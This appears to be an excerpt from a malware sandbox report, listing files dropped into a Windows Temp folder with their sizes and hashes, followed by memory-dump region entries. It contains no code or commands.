      8d2ae2bc515a72ed1976613d888f63c7beb01305be2bf07a6bc1a26d0c664e04128321d9de39ed1e6cdd8283519d5b3f20bae940d9ff5f585331c2cb9f67c386

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
      Filesize

      492KB

      MD5

      fafbf2197151d5ce947872a4b0bcbe16

      SHA1

      a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020

      SHA256

      feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71

      SHA512

      acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TarFD63.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      Filesize

      184KB

      MD5

      7fee8223d6e4f82d6cd115a28f0b6d58

      SHA1

      1b89c25f25253df23426bd9ff6c9208f1202f58b

      SHA256

      a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

      SHA512

      3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      Filesize

      61KB

      MD5

      a6279ec92ff948760ce53bba817d6a77

      SHA1

      5345505e12f9e4c6d569a226d50e71b5a572dce2

      SHA256

      8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

      SHA512

      213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
      Filesize

      5.3MB

      MD5

      1afff8d5352aecef2ecd47ffa02d7f7d

      SHA1

      8b115b84efdb3a1b87f750d35822b2609e665bef

      SHA256

      c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1

      SHA512

      e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\osloader.exe
      Filesize

      591KB

      MD5

      e2f68dc7fbd6e0bf031ca3809a739346

      SHA1

      9c35494898e65c8a62887f28e04c0359ab6f63f5

      SHA256

      b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

      SHA512

      26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\pkts.url
      Filesize

      117B

      MD5

      df4a7f07705560dae41b04d261e3d913

      SHA1

      d393b4b01f8bbe04ce0f6723d3bbc9d801b7045a

      SHA256

      245ff85e1e3801027ad43559df4894ae6c8008307efd8d06fa62fc2b0ab475a5

      SHA512

      8a4e10c7fbef633b56d4f219a2988699f1bdaeac16582430d612028f23fc0c2b9960dc8f02941e9012be08e5af7fc08a965b7e244a75d5a7d33387777bf4f6dc

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\pub2.exe
      Filesize

      274KB

      MD5

      6c361d900835b524646eefc9c4960aea

      SHA1

      6975a689ce08af60ffe31c5f14a00afe2a4bec4a

      SHA256

      4f96b58d759e99fb9588bafaa0258723f933b9d32474b6677cdb2d8c9957c318

      SHA512

      96f363c2113a35e5c49f850e81033a40b5f0bc4b06744c6cec0ff5bfe4444087a1679fed4d87a1e3c3ef4ccf2bab9e9ea66612c14485adabc341f0c251c8669c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\~DFD0D6AF50D7B6960B.TMP
      Filesize

      16KB

      MD5

      e0a81379cbb9eaf2b2f3e9b69cbb0069

      SHA1

      d754eb2a80c60c728a12aaee7e2f981875e091ca

      SHA256

      157cde3cf8794c469f4732011f652e4cd129b984815ae59c435c39765f8827ac

      SHA512

      3f24ac31bc34e6e6a373eb69eb65b39a5e267cfe468212b4f738d095d3758dacca50785238a4fbd56511222b1e2f4be5419d4a77fd10af5986b82219a45eb8ee

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Files.exe
      Filesize

      975KB

      MD5

      2d0217e0c70440d8c82883eadea517b9

      SHA1

      f3b7dd6dbb43b895ba26f67370af99952b7d83cb

      SHA256

      d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

      SHA512

      6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Folder.exe
      Filesize

      712KB

      MD5

      b89068659ca07ab9b39f1c580a6f9d39

      SHA1

      7e3e246fcf920d1ada06900889d099784fe06aa5

      SHA256

      9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

      SHA512

      940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Info.exe
      Filesize

      4.3MB

      MD5

      165c8d385e0af406deb1089b621c28db

      SHA1

      3d7b93f834a08a9bc790290a20aaf835aaaf9c5c

      SHA256

      7dc6c82e185577088f88e349a6d315138cdbed3956cbb6be5af1f9c098642a33

      SHA512

      0bbc83a67cfb0ca2f4976b04e84ba60d708ffb7f66050da73cd0a0f28cde09dfde9b762ff5ceca35c22f5461576c47e190342470c470c6360bfb4edad8e34e14

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Install.exe
      Filesize

      1.4MB

      MD5

      2d8ae85a8155eb6e73a00b731bf54927

      SHA1

      31321387579b747a8524aee33f3ed666a11c59b8

      SHA256

      b09541e6950cabd94ea006c019fbd732529bcad74e90c8e2c033dc5856eb93a0

      SHA512

      29cc708326e636800d82d7239ac627b85b8dbcde3be3265a664d1be4798268b7ff170b26c31c3232229e44e9a08db56bd90e24f1910c419587230bd4e8b4ce3b

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Lsr.exe
      Filesize

      1.5MB

      MD5

      4fc8f104dfc8719270afc95589821b3c

      SHA1

      933e722ba0bcdf0ffe47b8b1dc6bcab6a5c14691

      SHA256

      81cafcd5d3b5371b7718bf2d0d34edccffc661bcc3c1872360e02ff164c2c566

      SHA512

      c332fa3dd965d56a6cb1451614af77cc6618c755849517e1d5a118d1c73e783c390e78dd14c8913fc364e8dc2ae8dd2e4dead84245db0bf4d9ca2b10fbc43c22

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Updbdate.exe
      Filesize

      332KB

      MD5

      e0d7a00d5d1d17d549330622d5efbc57

      SHA1

      e3abe1626a305c75b223bc17a9de9245290c1571

      SHA256

      aae3cdeedc940844c30f81a0df1c1da150fc890c604fc81f0f81da729831e51f

      SHA512

      8931fd7e2b00fe4fc3386eaaf8bfd0d30005e5fda3795d105a866505c83e3c5aca59725a5d8dd6369cc43a426920f6eab1f9fc62e40755ea7c905ec9d27464da

      Download Submit

    • \Users\Admin\AppData\Local\Temp\md9_1sjm.exe
      Filesize

      921KB

      MD5

      a3ec5ee946f7b93287ba9cf7facc6647

      SHA1

      3595b700f8e41d45d8a8d15b42cd00cc19922647

      SHA256

      5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

      SHA512

      63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

      Download Submit

    • memory/408-514-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/408-523-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/852-238-0x0000000000C70000-0x0000000000CBC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/852-241-0x0000000000C70000-0x0000000000CBC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/852-401-0x0000000001AD0000-0x0000000001B41000-memory.dmp

      Filesize

      452KB

      Download

    • memory/852-239-0x0000000001AD0000-0x0000000001B41000-memory.dmp

      Filesize

      452KB

      Download

    • memory/876-576-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/876-599-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1548-647-0x0000000000400000-0x00000000023AF000-memory.dmp

      Filesize

      31.7MB

      Download

    • memory/1680-921-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-927-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-916-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-935-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-441-0x00000000049B0000-0x0000000004DEC000-memory.dmp

      Filesize

      4.2MB

      Download

    • memory/1680-933-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-713-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-734-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-931-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-929-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-919-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-776-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-774-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-649-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1680-757-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1724-442-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/1724-403-0x0000000004910000-0x0000000004D4C000-memory.dmp

      Filesize

      4.2MB

      Download

    • memory/1868-471-0x0000000000400000-0x000000000045B000-memory.dmp

      Filesize

      364KB

      Download

    • memory/1868-468-0x0000000000400000-0x000000000045B000-memory.dmp

      Filesize

      364KB

      Download

    • memory/1916-144-0x00000000002F0000-0x000000000030A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1916-136-0x00000000002B0000-0x00000000002D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1920-92-0x0000000004A90000-0x0000000004ECC000-memory.dmp

      Filesize

      4.2MB

      Download

    • memory/1920-404-0x0000000000400000-0x00000000030E7000-memory.dmp

      Filesize

      44.9MB

      Download

    • memory/2012-631-0x0000000000210000-0x000000000026B000-memory.dmp

      Filesize

      364KB

      Download

    • memory/2012-636-0x0000000000210000-0x000000000026B000-memory.dmp

      Filesize

      364KB

      Download

    • memory/2012-653-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2012-463-0x0000000000210000-0x000000000026B000-memory.dmp

      Filesize

      364KB

      Download

    • memory/2012-467-0x0000000000210000-0x000000000026B000-memory.dmp

      Filesize

      364KB

      Download

    • memory/2012-574-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2012-654-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2012-575-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2084-768-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2084-770-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2084-771-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2084-762-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2084-764-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2084-769-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2084-760-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2084-766-0x0000000000400000-0x000000000041E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2152-53-0x0000000000940000-0x0000000000AC8000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/2152-340-0x0000000000590000-0x0000000000614000-memory.dmp

      Filesize

      528KB

      Download

    • memory/2152-58-0x0000000000140000-0x0000000000150000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2224-108-0x0000000000400000-0x000000000062B000-memory.dmp

      Filesize

      2.2MB

      Download

    • memory/2224-712-0x0000000000400000-0x000000000062B000-memory.dmp

      Filesize

      2.2MB

      Download

    • memory/2224-646-0x0000000000400000-0x000000000062B000-memory.dmp

      Filesize

      2.2MB

      Download

    • memory/2440-758-0x0000000006100000-0x000000000618A000-memory.dmp

      Filesize

      552KB

      Download

    • memory/2440-249-0x0000000000150000-0x000000000025A000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/2440-339-0x0000000000780000-0x0000000000798000-memory.dmp

      Filesize

      96KB

      Download

    • memory/2440-759-0x0000000002070000-0x000000000208E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2704-55-0x0000000003510000-0x0000000003512000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2704-107-0x0000000004800000-0x0000000004A2B000-memory.dmp

      Filesize

      2.2MB

      Download

    • memory/2824-54-0x0000000002400000-0x0000000002422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2824-57-0x0000000002470000-0x0000000002490000-memory.dmp

      Filesize

      128KB

      Download

    • memory/2824-635-0x0000000000400000-0x00000000023BE000-memory.dmp

      Filesize

      31.7MB

      Download

    • memory/2876-244-0x00000000004F0000-0x0000000000561000-memory.dmp

      Filesize

      452KB

      Download

    • memory/2876-242-0x0000000000110000-0x000000000015C000-memory.dmp

      Filesize

      304KB

      Download